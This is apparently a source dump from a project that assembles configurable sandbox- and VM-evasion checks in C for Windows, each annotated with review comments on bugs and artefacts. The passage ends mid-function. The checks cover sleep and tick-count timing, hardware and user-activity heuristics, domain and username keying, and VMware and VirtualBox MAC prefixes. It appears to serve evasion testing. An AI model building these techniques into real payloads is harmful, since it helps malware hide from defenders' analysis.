// (Will likely produce false results for greater n due to modulo reduction inside integer boundaries)
//
// arg1: Number of seconds to run the computation
//
// Compute-bound delay loop bounded by elapsed clock() time instead of an
// iteration count. The time check only runs every 100 iterations (i % 100 == 0),
// which is why the duration is "approximately" arg1 seconds.
// NOTE(review): whether clock() measures CPU time or wall time depends on the
// C runtime in use — confirm for the target toolchain.
// This technique never exits the process; its only side effect is the printf.
void computation_timed_fibonacci(char *arg1) {
    int time = atoi(arg1);
    DEBUG_PRINT("Computing elements of the Fibonacci series for %s seconds...\n", arg1);

    unsigned int a = 0;
    unsigned int b = 1;
    unsigned int c = 0;

    clock_t start = clock();
    clock_t end;
    float elapsed_seconds = 0.0;

    unsigned int i = 2;
    while(1) {
        // Check elapsed time every 100 iterations
        if (i%100 == 0) {
            end = clock();
            elapsed_seconds = (float)(end - start) / CLOCKS_PER_SEC;
            if(elapsed_seconds > ((float) time)) {
                break;
            }
        }

        c = a + b;
        a = b;
        b = c;
        i++;
    }

    // Ensure that the computed value is required at the end of the data flow.
    printf("Final number is %u.", c);
}
--------------------------------------------------------------------------------
/source/implementations/evasion/evasion_by_sleep.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// Sleep for a specified time
//
// arg1: time in Seconds
//
// Plain delay: Sleep(atoi(arg1) * 1000) milliseconds, then continue unconditionally.
// NOTE(review): time * 1000 is int arithmetic; large arg1 values overflow before
// the conversion to Sleep()'s DWORD parameter.
void evasion_by_sleep(char *arg1) {
    DEBUG_PRINT("Applying evasion_by_sleep technique.\n");
    DEBUG_PRINT("Sleeping for %s Seconds...\n", arg1);

    int time = atoi(arg1);
    Sleep(time * 1000);
    DEBUG_PRINT("Proceed!\n");
}
--------------------------------------------------------------------------------
/source/implementations/evasion/fopen_sandbox_evasion.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../debug_print/debug_print.h"


// Checks if a given file exists on the system. If opening fails, the program exits.
//
// arg1: Specifies the file to check upon.
// Existence check via fopen(arg1, "rb"): any fopen() failure (missing file,
// access denied, ...) leads to exit(0). The handle is closed on success;
// the fclose() return value is not checked (read-only stream, nothing to flush).
void fopen_sandbox_evasion(char *arg1) {
    DEBUG_PRINT("Applying fopen sandbox evasion technique.\n");
    DEBUG_PRINT("Checking for file %s...\n", arg1);

    FILE *fp = fopen(arg1, "rb");

    if (fp == NULL) {
        exit(0);
    }

    fclose(fp);
}
--------------------------------------------------------------------------------
/source/implementations/evasion/get_bios_info.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"

// Layout of the buffer filled by GetSystemFirmwareTable('RSMB', ...).
// SMBIOSTableData is a C99 flexible array member; presumably it holds
// `Length` bytes of raw table data — the code below never reads it.
struct RawSMBIOSData
{
    BYTE Used20CallingMethod;
    BYTE SMBIOSMajorVersion;
    BYTE SMBIOSMinorVersion;
    BYTE DmiRevision;
    DWORD Length;
    BYTE SMBIOSTableData[];
};

// Checks if it is possible to fetch SMBIOS firmware table
//
// Proceed if possible, else exit.
//
// Two-call pattern: the first GetSystemFirmwareTable() call sizes the buffer,
// the second fills it. The process proceeds only when the byte count of the
// second call equals the size reported by the first. arg1 is unused.
// NOTE(review): a failed HeapAlloc() only logs and falls through into the
// second call with a NULL buffer; the allocation is never freed.
// NOTE(review): if the size query returns 0, a zero-byte allocation followed
// by a 0 == 0 comparison would also "Proceed" — confirm the intended outcome.
void get_bios_info(char *arg1) {
    DWORD smBiosDataSize = 0;
    struct RawSMBIOSData *smBiosData = NULL;
    DWORD bytesWritten = 0;

    DEBUG_PRINT("Applying get_bios_info evasion technique.\n");
    DEBUG_PRINT("Exiting if unable to fetch bios info\n");

    // Query size of SMBIOS data.
    smBiosDataSize = GetSystemFirmwareTable('RSMB', 0, NULL, 0);

    smBiosData = (struct RawSMBIOSData*) HeapAlloc(GetProcessHeap(), 0, smBiosDataSize);
    if (!smBiosData) {
        DEBUG_PRINT("Out of memory\n");
    }

    // Retrieve the SMBIOS table
    bytesWritten = GetSystemFirmwareTable('RSMB', 0, smBiosData, smBiosDataSize);

    if (bytesWritten == smBiosDataSize) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/get_computer_domain.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// Queries the DNS domain the target is in.
// If the target is not in the expected domain as specified in arg1, the program exits.
//
// arg1: Expected domain name
//
// Environment-keyed execution: the sample only continues on machines whose
// ComputerNameDnsDomain matches arg1 exactly (case-sensitive strcmp), so an
// analysis host outside that domain observes an immediate exit(0).
// NOTE(review): the GetComputerNameEx() return value is not checked; on failure
// domainNameBuf is uninitialised when strcmp() reads it.
void get_computer_domain(char *arg1) {
    DEBUG_PRINT("Applying get_computer_domain sandbox evasion technique.\n");
    DEBUG_PRINT("Expected domain is %s...\n", arg1);

    DWORD bufSize = MAX_PATH;
    TCHAR domainNameBuf[MAX_PATH];

    GetComputerNameEx(ComputerNameDnsDomain, domainNameBuf, &bufSize);

    DEBUG_PRINT("Retrieved domain is %s\n", domainNameBuf);

    if(strcmp(domainNameBuf, arg1) != 0) {
        DEBUG_PRINT("Not in expected domain, exiting...");
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/get_cpu_cores.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// Investigates the number of CPU cores present on the system. If core count is lower than a specified number, the program exits.
//
// arg1: Specifies the core number threshold. Program exits if core count is less than threshold.
//
// Exits when SYSTEM_INFO.dwNumberOfProcessors is below strtol(arg1).
// NOTE(review): the strtol() result is not validated; a non-numeric arg1 gives
// 0 and the check never exits. The comparison is DWORD (unsigned) against long,
// so a negative threshold is presumably converted to a large unsigned value.
void get_cpu_cores(char *arg1) {
    SYSTEM_INFO sysinfo;
    GetSystemInfo(&sysinfo);

    // arg1 is expected to be a valid base-10 integer representation.
    long cpu_core_threshold = strtol(arg1, NULL, 10);

    DEBUG_PRINT("Applying get_cpu_cores evasion technique.\n");
    DEBUG_PRINT("Exiting if number of cpu cores is lower than %ld...\n", cpu_core_threshold);

    if (sysinfo.dwNumberOfProcessors < cpu_core_threshold) {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/get_eventlog.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// Investigates the number of eventlogs present on the system. If eventlog count is lower than a specified number, the program exits.
//
// arg1: Specifies the eventlog number threshold. Program exits if eventlog count is less than threshold.
// Spawns `powershell.exe <pwsh>` through popen() and parses the leading integer
// of its output as the number of event logs; exits unless it exceeds strtol(arg1).
// Observable host artefact: a powershell.exe child process carrying the
// Get-WinEvent -ListLog command line below.
// NOTE(review): retval[10] is never initialised, and strcat() appends each
// fgets() line (up to 127 bytes) into it — undefined behaviour and a stack
// overflow for any real output.
// NOTE(review): malloc() is unchecked, `command` is never freed and `fp` is
// never pclose()d. The "%d" debug format is paired with a long argument.
void get_eventlog(char *arg1) {
    DEBUG_PRINT("Applying get_eventlog evasion technique.\n");

    char *call = "powershell.exe ";
    char *pwsh = "$lines = Get-WinEvent -ListLog * ^| measure-object -line; echo $lines.Lines";
    char *command = (char *) malloc(strlen(pwsh) + strlen(call) + 1);
    long num_eventlog_threshold = strtol(arg1, NULL, 10);

    FILE *fp;
    char buf[128];
    char retval[10];

    strcpy(command, call);
    strcat(command, pwsh);

    if ((fp = popen(command, "r")) == NULL) {
        DEBUG_PRINT("Error opening pipe!\n");
        exit(0);
    }

    while (fgets(buf, 128, fp) != NULL) {
        strcat(retval, buf);
    }

    long eventlog_count = strtol(retval, NULL, 10);
    DEBUG_PRINT("%d\n", eventlog_count);

    if (eventlog_count > num_eventlog_threshold) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/get_install_date.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// Fetch Installation date of Windows
//
// arg1: Date in dd/mm/yyyy, If dates doesn't match the program exits.
// Runs `systeminfo | find /i "original"` through popen() (presumably isolating
// the "Original Install Date" line) and proceeds only if arg1 occurs as a
// substring of the captured output. Because this is strstr(), any date format
// that appears verbatim in that line matches — not only dd/mm/yyyy.
// Observable host artefacts: cmd.exe, systeminfo.exe and find.exe child processes.
// NOTE(review): installdate[200] is never initialised before strcat() appends
// to it — undefined behaviour; output longer than 199 bytes overflows it.
void get_install_date(char *arg1) {
    char *cmd = "systeminfo | find /i \"original\"";
    FILE *fp;
    char installdate[200];
    char buf[128];

    if ((fp = popen(cmd, "r")) == NULL) {
        DEBUG_PRINT("Error opening pipe!\n");
        exit(0);
    }

    while (fgets(buf, 128, fp) != NULL) {
        strcat(installdate, buf);
    }

    DEBUG_PRINT("Applying get_install_date evasion technique.\n");
    DEBUG_PRINT("Exiting if dates does not match.\n");
    pclose(fp);

    if (strstr(installdate, arg1) != NULL) {
        DEBUG_PRINT("Proceed!\n");

    } else {
        DEBUG_PRINT("Dates does not match: %s != %s", installdate, arg1);
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/get_num_processes.h:
--------------------------------------------------------------------------------
#include
#include
#include
#include "../debug_print/debug_print.h"


// Count the number of running Processes
//
// arg1: Specifies process threshold. Program exits if process count is less than threshold.
// Counts the PIDs EnumProcesses() writes into a fixed 1024-entry array and
// exits when fewer than atoi(arg1) processes are running.
// NOTE(review): if EnumProcesses() fails the code only logs; cbNeeded is then
// uninitialised but still used for the count.
// NOTE(review): cbNeeded cannot exceed sizeof(loadedProcesses) per the API
// contract, so the count saturates at 1024 on busy hosts.
// NOTE(review): DWORD vs int comparison; a negative arg1 converts to unsigned.
void get_num_processes(char *arg1) {
    int minNumProcesses = atoi(arg1);

    DWORD loadedProcesses[1024];
    DWORD cbNeeded;
    DWORD runningProcesses;

    if (!EnumProcesses(loadedProcesses, sizeof(loadedProcesses), &cbNeeded)) {
        DEBUG_PRINT("Could not get processes.\n");
    }

    runningProcesses = cbNeeded / sizeof(DWORD);

    DEBUG_PRINT("Applying get_num_processes evasion technique.\n");
    DEBUG_PRINT("Exiting if number of processes are below threshold.\n");

    if (runningProcesses >= minNumProcesses) {
        DEBUG_PRINT("Proceed!.\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/get_registry_size.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../debug_print/debug_print.h"

//
// WIP
//
// Reads the HKEY_PERFORMANCE_DATA "Global" value into an 8 KiB buffer and
// proceeds only if the query succeeds and the threshold from arg1 is met.
// NOTE(review): the threshold is compared with the constant BufferSize (8192),
// not with the returned cbData, so the outcome does not depend on the amount
// of performance data actually present.
// NOTE(review): PerfData is never freed and malloc() is unchecked.
void get_registry_size(char *arg1) {
    DWORD BufferSize = 8192;
    DWORD cbData;
    DWORD dwRet;

    long threshold = strtol(arg1, NULL, 10);

    PPERF_DATA_BLOCK PerfData = (PPERF_DATA_BLOCK) malloc( BufferSize );
    cbData = BufferSize;

    DEBUG_PRINT("Applying get_registry_size evasion technique.\n");
    DEBUG_PRINT("Exiting if size is less than given threshold\n");

    dwRet = RegQueryValueEx( HKEY_PERFORMANCE_DATA,
                             TEXT("Global"),
                             NULL,
                             NULL,
                             (LPBYTE) PerfData,
                             &cbData );

    if (dwRet == ERROR_SUCCESS && BufferSize >= threshold) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/get_standard_browser.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// Program exits if Browser does not Match with given Argument
//
// arg1: Program ID of the Browser: MSEdgeHTM, Firefox or ChromeHTML
//
// Reads HKCU\SOFTWARE\Microsoft\Windows\Shell\Associations\URLAssociations\http\UserChoice\Progid
// and exits unless arg1 is a substring (strstr) of the stored ProgId.
// NOTE(review): BufferSize (8192) is passed for a 255-byte stack buffer; a
// longer registry value overflows `value`.
// NOTE(review): the RegGetValue() return is unchecked; on failure `value` is
// uninitialised when strstr() reads it.
void get_standard_browser(char *arg1) {
    char value[255];
    DWORD BufferSize = 8192;

    // Read Registry Key to get the default Browser
    RegGetValue(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\Shell\\Associations\\URLAssociations\\http\\UserChoice", "Progid", RRF_RT_ANY, NULL, (PVOID)&value, &BufferSize);
    DEBUG_PRINT("Applying get_standard_browser evasion technique.\n");
    DEBUG_PRINT("Exiting if provided Browser does not match.\n");

    if(strstr(value, arg1) != NULL){
        DEBUG_PRINT("Proceed!\n");
    } else {
        DEBUG_PRINT("Browsers does not match %s != %s\n", value, arg1);
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/get_tickcount.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"
#include

// Check if sandbox utilize fast forwarding to reduce heuristic check time
//
// use GetTickCount before and after sleep and calculate the difference
// If the difference and specified sleep time match, we proceed
// arg1: nothing
//
// Timing check against sleep acceleration: samples GetTickCount() around a
// 100-second relative delay issued via NtDelayExecution (resolved at run time
// from ntdll.dll) and exits unless at least 100000 ms of tick count elapsed.
// Observable artefacts: GetProcAddress(..., "NtDelayExecution") and a ~100 s stall.
// NOTE(review): the GetProcAddress() result is called without a NULL check.
// NOTE(review): GetTickCount() returns a 32-bit DWORD (widened to ULONGLONG
// here), so its wrap-around is not handled.
void get_tickcount(char *arg1) {
    DEBUG_PRINT("Applying get_tickcount technique.\n");

    ULONGLONG uptimeBeforeSleep = GetTickCount();

    LARGE_INTEGER delay;
    // Negative QuadPart = relative delay in 100-ns units: 10000 * 100000 = 10^9 = 100 s.
    delay.QuadPart = -10000 * 100000; // 100 seconds
    typedef NTSTATUS(WINAPI *PNtDelayExecution)(IN BOOLEAN, IN PLARGE_INTEGER);
    PNtDelayExecution pNtDelayExecution = (PNtDelayExecution)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtDelayExecution");

    pNtDelayExecution(FALSE, &delay);

    ULONGLONG uptimeAfterSleep = GetTickCount();

    if ((uptimeAfterSleep - uptimeBeforeSleep) < 100000) {
        exit(0);
    } else {
        DEBUG_PRINT("Proceed!\n");
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/get_usb.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../debug_print/debug_print.h"


//
// WIP
//
// Counts the subkeys of HKLM\SYSTEM\ControlSet001\Enum\USBSTOR (per the comment
// below, one per USB storage device that was ever mounted) and exits when fewer
// than atoi(arg1) exist. Open/query failures only log; numUsbDevices stays 0.
// NOTE(review): hKey is never closed with RegCloseKey().
// NOTE(review): the debug formats use "%ld" for an int and "%d" for a DWORD.
// NOTE(review): DWORD vs int comparison; a negative arg1 converts to unsigned.
void get_usb(char *arg1) {
    HKEY hKey;
    DWORD numUsbDevices = 0;
    int MinimumUsbHistory = atoi(arg1);

    DEBUG_PRINT("Applying get_usb evasion technique.\n");

    // Open Key with USB Information
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Enum\\USBSTOR", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        // number of Subkeys = number of mounted USB devices
        // Get number of subkeys
        if (RegQueryInfoKeyA(hKey, NULL, NULL, NULL, &numUsbDevices, NULL, NULL, NULL, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {
            // Success: numUsbDevices now holds the subkey count; nothing else to do.
        } else {
            DEBUG_PRINT("Unable to query subkey HKLM::SYSTEM\\ControlSet001\\Enum\\USBSTOR\n");
        }
    } else {
        DEBUG_PRINT("Unable to open subkey HKLM::SYSTEM\\ControlSet001\\Enum\\USBSTOR\n");
    }

    DEBUG_PRINT("Exiting if number of mounted usb devices is lower than %ld...\n", MinimumUsbHistory);

    if (numUsbDevices >= MinimumUsbHistory) {
        DEBUG_PRINT("Number of USB devices ever mounted: %d\n", numUsbDevices);
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/gethostbyname_sandbox_evasion.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// gethostbyname evasion technique.
// Attempts to gather information associated with a specified host.
// The gethostbyname function is expected to fail (by returning NULL). If it succeeds instead, the program exits.
//
// arg1: Specifies the host name to lookup.
// ---
// Link with -lws2_32 switch when compiling
//
// Inverted DNS check: arg1 is meant to be a name that must NOT resolve, so an
// environment that answers every lookup is rejected with exit(0).
// Observable network artefact: a DNS query for arg1.
// NOTE(review): no WSAStartup() is visible in this file; presumably it is done
// elsewhere — confirm, since Winsock calls fail without it.
void gethostbyname_sandbox_evasion(char *arg1) {
    DEBUG_PRINT("Applying gethostbyname sandbox evasion technique.\n");
    DEBUG_PRINT("Attempting to retrieve info for hostname %s...\n", arg1);

    struct hostent *hp = gethostbyname(arg1);

    if(hp != NULL) {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/has_background_wp.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include
#include "../debug_print/debug_print.h"


// Proceed if a background wallpaper is set, else exits
//
// Exits unless %APPDATA%\Microsoft\Windows\Themes\TranscodedWallpaper exists
// (access() with F_OK, i.e. existence only). arg1 is unused.
// NOTE(review): when APPDATA is unset the code only logs and then passes NULL
// to sprintf("%s") — undefined behaviour.
// NOTE(review): unbounded sprintf() into a 1024-byte buffer; a very long
// APPDATA value overflows it.
void has_background_wp(char *arg1) {
    char * appdata = getenv("APPDATA");

    if (!appdata) {
        DEBUG_PRINT("Unable to get APPDATA.\n");
    }
    char buffer[1024];
    sprintf(buffer, "%s\\Microsoft\\Windows\\Themes\\TranscodedWallpaper", appdata);

    DEBUG_PRINT("Applying has_background_wp evasion technique.\n");
    DEBUG_PRINT("Exiting if background wallpaper is not set\n");
    if( access(buffer, F_OK ) != -1 ) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/has_folder.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"

// This function checks if a folder exists.
//
// arg1: path to folder
// must be in unix style, because "\" makes problems
//
// Exits unless stat(arg1) reports a directory.
// NOTE(review): the stat() return value is unchecked; when the path does not
// exist `stats` is uninitialised and S_ISDIR() reads indeterminate bits.
void has_folder(char *arg1) {
    DEBUG_PRINT("Applying has_folder evasion technique.\n");
    DEBUG_PRINT("Exiting if %s does not exists.\n", arg1);

    struct stat stats;

    stat(arg1, &stats);

    if (S_ISDIR(stats.st_mode)) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/has_network_drive.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// Check if Network Drive exists, proceed if this is the case
//
// Exits unless the path held in the CSIDL_NETWORK environment variable is a
// directory. arg1 is unused.
// NOTE(review): CSIDL_NETWORK is a shell-folder constant rather than a variable
// the environment normally provides, so getenv() likely returns NULL; that NULL
// is only logged and then passed to stat() — undefined behaviour.
// NOTE(review): the debug text mentions "recent files directory" (copied from
// has_recent_files); the stat() return value is unchecked.
void has_network_drive(char *arg1) {
    char * network = getenv("CSIDL_NETWORK");

    if (!network) {
        DEBUG_PRINT("Unable to get CSIDL_NETWORK\n");
    }

    DEBUG_PRINT("Applying has_network_drive evasion technique.\n");
    DEBUG_PRINT("Exiting if recent files directory does not exist.\n");
    struct stat stats;

    stat(network, &stats);

    if (S_ISDIR(stats.st_mode)) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/has_process_exit.h:
--------------------------------------------------------------------------------
// look for process, exit if process exist
// (C++ translation unit: relies on std::string and std::cout.)
#include
#include
#include
#include
#include
#include
#include
#include
#include "../debug_print/debug_print.h"

using namespace std;

BOOL GetProcessList(char *arg1);
// NOTE(review): declared here but not defined in this file.
BOOL TerminateBlacklistedProcess(DWORD dwProcessId, UINT uExitCode);

// Process-name blocklist check: walks the process list looking for arg1.
// NOTE(review): despite the name and the comment above, nothing here calls
// exit(): GetProcessList() returns TRUE whether or not the name was found,
// and its return value is ignored, so this technique never terminates the process.
void has_process_exit( char *arg1 )
{
    DEBUG_PRINT("Applying has_processes_exit technique.\n");
    DEBUG_PRINT("Looking for process %s and exit if found.\n", arg1);
    GetProcessList( arg1 );
}

// Walks a TH32CS_SNAPPROCESS snapshot and compares each szExeFile with arg1
// (exact, case-sensitive std::string comparison).
// Returns FALSE only when the snapshot or Process32First() fails; TRUE otherwise,
// both when the name was found (after printing to cout) and when it was not.
// NOTE(review): on the "found" path the snapshot handle is not closed.
// hProcess and dwPriorityClass are unused.
BOOL GetProcessList(char *arg1 )
{
    DEBUG_PRINT("GetProcessList\n");
    HANDLE hProcessSnap;
    HANDLE hProcess;
    PROCESSENTRY32 pe32;
    DWORD dwPriorityClass;

    //Blacklisted processes
    LPSTR ProcessName = arg1;

    // Take a snapshot of processes
    hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    if( hProcessSnap == INVALID_HANDLE_VALUE )
    {
        printf("exit\n");
        return( FALSE );
    }

    pe32.dwSize = sizeof( PROCESSENTRY32 );

    if( !Process32First( hProcessSnap, &pe32 ) )
    {
        CloseHandle( hProcessSnap );
        return( FALSE );
    }

    do
    {
        string str(pe32.szExeFile);


        if(str == ProcessName)
        {
            cout << "[*] process found, exit: " << (ProcessName) << endl;
            return (TRUE);
        }

    } while( Process32Next( hProcessSnap, &pe32 ) );

    CloseHandle( hProcessSnap );
    return( TRUE );
}
--------------------------------------------------------------------------------
/source/implementations/evasion/has_public_desktop.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// Check if Public Desktop exists, proceed if this is the case
//
// Exits unless c:\Users\Public\Desktop is a directory. arg1 is unused.
// NOTE(review): the stat() return value is unchecked; `stats` is indeterminate
// when the path is missing.
void has_public_desktop(char *arg1) {
    DEBUG_PRINT("Applying has_public_desktop evasion technique.\n");
    DEBUG_PRINT("Exiting if public desktop does not exists.\n");

    struct stat stats;

    stat("c:\\Users\\Public\\Desktop", &stats);

    if (S_ISDIR(stats.st_mode)) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/has_recent_files.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// Check if Recent Files Folder exists, proceed if this is the case
//
// Exits unless the path held in the CSIDL_RECENT environment variable is a
// directory. Unlike the other techniques this one takes no arg1 parameter.
// NOTE(review): CSIDL_RECENT is a shell-folder constant rather than a variable
// the environment normally provides, so getenv() likely returns NULL; that NULL
// is only logged and then passed to stat() — undefined behaviour.
// NOTE(review): the stat() return value is unchecked.
void has_recent_files() {
    char * recentFiles = getenv("CSIDL_RECENT");

    if (!recentFiles) {
        DEBUG_PRINT("Unable to get CSIDL_RECENT\n");
    }

    DEBUG_PRINT("Applying has_recent_files evasion technique.\n");
    DEBUG_PRINT("Exiting if recent files directory does not exist.\n");
    struct stat stats;

    stat(recentFiles, &stats);

    if (S_ISDIR(stats.st_mode)) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/has_recycle_bin.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// Check if Recycle Bin exists, proceed if this is the case
//
// Exits unless c:\$Recycle.Bin is a directory. arg1 is unused.
// NOTE(review): the stat() return value is unchecked; `stats` is indeterminate
// when the path is missing.
void has_recycle_bin(char *arg1) {
    DEBUG_PRINT("Applying has_recycle_bin evasion technique.\n");
    DEBUG_PRINT("Exiting if recycle bin does not exists.\n");

    struct stat stats;

    stat("c:\\$Recycle.Bin", &stats);

    if (S_ISDIR(stats.st_mode)) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/has_username.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include
#include "../debug_print/debug_print.h"


// Lookup the username of the current user
//
// arg1: username, if given username does not match with the fetched username
// the Program exits
//
// Environment-keyed execution on %USERNAME%: exact, case-sensitive strcmp
// against arg1; any other account observes an immediate exit(0).
// NOTE(review): getenv() returns NULL when the variable is unset, and
// strcmp(NULL, ...) is undefined behaviour. Stray second ';' after getenv().
void has_username(char *arg1) {

    char* username = getenv("USERNAME");;


    DEBUG_PRINT("Applying has_username evasion technique.\n");
    DEBUG_PRINT("Exiting if given username does not match.\n");

    if (!strcmp(username, arg1)) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        DEBUG_PRINT("Username does not match %s != %s.\n", arg1, username);
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/has_vm_mac.h:
--------------------------------------------------------------------------------
/* Large parts of the code copied/inspired from https://github.com/a0rtega/pafish
   should work for vmware and VirtualBox */
#pragma once

#include
#include
#include
#include
#include
#include "../debug_print/debug_print.h"


/* left the original pafish function */
/*
 * Returns TRUE if any adapter with a 6-byte physical address starts with the
 * 3-byte OUI in mac_vendor, FALSE otherwise. Comparison is memcmp() of 3 bytes,
 * so a leading NUL byte in the vendor prefix (as in the callers below) is fine.
 * Two-call GetAdaptersAddresses() pattern: the first call sizes the list, the
 * second fills it; the list is released with LocalFree() on every return path.
 * NOTE(review): the return value of the second GetAdaptersAddresses() call is
 * not checked.
 */
int pafish_check_mac_vendor(char * mac_vendor) {
    unsigned long alist_size = 0, ret;

    ret = GetAdaptersAddresses(AF_UNSPEC,0,0,0,&alist_size);
    if(ret==ERROR_BUFFER_OVERFLOW) {
        IP_ADAPTER_ADDRESSES* palist = (IP_ADAPTER_ADDRESSES*)LocalAlloc(LMEM_ZEROINIT,alist_size);
        void * palist_free = palist;
        if(palist) {
            GetAdaptersAddresses(AF_UNSPEC,0,0,palist,&alist_size);
            char mac[6]={0};
            while (palist){
                if (palist->PhysicalAddressLength==0x6){
                    memcpy(mac,palist->PhysicalAddress,0x6);
                    if (!memcmp(mac_vendor, mac, 3)) { /* First 3 bytes are the same */
                        LocalFree(palist_free);
                        return TRUE;
                    }
                }
                palist = palist->Next;
            }
            LocalFree(palist_free);
        }
    }
    return FALSE;
}


/*
 * Exits if any adapter's OUI matches one of the hard-coded VMware prefixes
 * (00:05:69, 00:0C:29, 00:1C:14, 00:50:56) or the VirtualBox prefix 08:00:27.
 * Takes no argument; the vendor list is fixed at compile time.
 */
void has_vm_mac()
{
    /*
    VMware is any of
    00:05:69
    00:0C:29
    00:1C:14
    00:50:56
    */
    if (pafish_check_mac_vendor("\x00\x05\x69")) {
        DEBUG_PRINT("MAC VMWare found.\n");
        exit(0);
    }
    else if (pafish_check_mac_vendor("\x00\x0C\x29")) {
        DEBUG_PRINT("MAC VMWare found.\n");
        exit(0);
    }
    else if (pafish_check_mac_vendor("\x00\x1C\x14")) {
        DEBUG_PRINT("MAC VMWare found.\n");
        exit(0);
    }
    else if (pafish_check_mac_vendor("\x00\x50\x56")) {
        DEBUG_PRINT("MAC VMWare found.\n");
        exit(0);
    }
    /* VirtualBox mac starts with 08:00:27 */
    else if (pafish_check_mac_vendor("\x08\x00\x27")) {
        DEBUG_PRINT("MAC VirtualBox found.\n");
        exit(0);
    }

}
--------------------------------------------------------------------------------
/source/implementations/evasion/has_vm_regkey.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../debug_print/debug_print.h"


// Checks for a specified set of strings related to VM environments in the registry.
// If one of the strings is found, the program exits.
//
// arg1: Specifies the set of strings to search for. Entries are comma-separated.
// Hence, individual search strings must not contain comma characters.
// Total search string length is currently limited to 1023.
//
// Reads value "0" of HKLM\SYSTEM\ControlSet001\Services\Disk\Enum (presumably
// the first disk's device-instance string) and exits if any comma-separated
// entry of arg1 is a substring of it. A failure to open the key only logs.
// NOTE(review): the RegQueryValueEx() return is unchecked and szBuffer is not
// guaranteed NUL-terminated (dwSize leaves one byte spare but nothing writes
// it), so strstr() may read indeterminate data when the query fails.
// NOTE(review): strcpy(complete_search_str, arg1) does not enforce the 1023-byte
// limit stated above. `i` is unused.
void has_vm_regkey(char *arg1) {
    DEBUG_PRINT("Applying has_vm_regkey evasion technique.\n");
    DEBUG_PRINT("Checking registry key SYSTEM\\ControlSet001\\Services\\Disk\\Enum for search set %s...\n", arg1);

    HKEY hKey;
    int i;
    char szBuffer[1024];
    char complete_search_str[1024];
    char *current_search_str;
    char *delim;

    DWORD dwSize = sizeof(szBuffer) - 1;

    // Retrieve registry key content
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Services\\Disk\\Enum", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        RegQueryValueEx(hKey, "0", NULL, NULL, (unsigned char *)szBuffer, &dwSize);

        // Compare content against search strings
        // Work on our own copy
        strcpy(complete_search_str, arg1);
        // Set current marker at beginning
        current_search_str = complete_search_str;

        // Iterate until no comma delimiter found
        while((delim = strchr(current_search_str, ',')) != NULL) {
            // Terminate current string at delimiter
            *delim = '\0';

            // Search for current string in registry content. If found, exit.
            if(strstr(szBuffer, current_search_str)) {
                DEBUG_PRINT("Found %s, exiting...\n", current_search_str);
                RegCloseKey(hKey);
